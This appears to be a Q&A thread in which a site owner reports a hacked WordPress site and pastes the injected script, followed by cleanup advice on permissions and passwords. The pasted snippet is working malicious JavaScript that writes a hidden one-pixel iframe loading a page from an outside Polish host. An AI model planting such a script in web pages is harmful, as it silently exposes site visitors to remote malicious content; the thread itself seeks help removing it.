# Wordpress hack injects javascript / iframes

Tags: wordpress, virus

My (Wordpress) website seems to be hacked, and code is added to the main index.php file, the themes index.php file and the themes header.php file.

This part comes from the header.php

```
#f524d6#
<script type=\"text/javascript\" language=\"javascript\" >
(function () {    var kilun = document.createElement('iframe');    kilun.src = 'http://hosting3081247.az.pl/cgi-bin/counter.php';    kilun.style.position = 'absolute';    kilun.style.border = '0';    kilun.style.height = '1px';    kilun.style.width = '1px';    kilun.style.left = '1px';    kilun.style.top = '1px';    if (!document.getElementById('kilun')) {        document.write('<div id=\'kilun\'></div>');        document.getElementById('kilun').appendChild(kilun);    }})();</script>";
#/f524d6#
```

Can somebody tell me how to remove this? It returns after removal the lines of code.

Comment: Change the permissions on the file so PHP won't be able to write it, remove the code, then check your error logs for which file couldn't open it. (It might not work, but it's worth a shot.)

Comment: It's not just Wordpress. I found this on my website this morning. After searching I found many other sites have the same code, although there are references to addresses in Poland, Slovakia, and Sweden. My passwords are changed, files scrubbed, and a morning lost. I'd be interested to know if anyone has determined what the sites are attempting to do.

Answer (score 1):

if you find this on normal html/php pages—not only inside wordpress-then it's probably a script that parse all files on the server (ie not a wp hack) in which case it's better to change username and password for server (as well as for wordpress): ftp, shell etc.

Answer (score -1):

- Change your folders and files with minimum permissions.
- Protect your `.htaccess`.
- Check for folder ownership.
- Change all your passwords and create harder ones.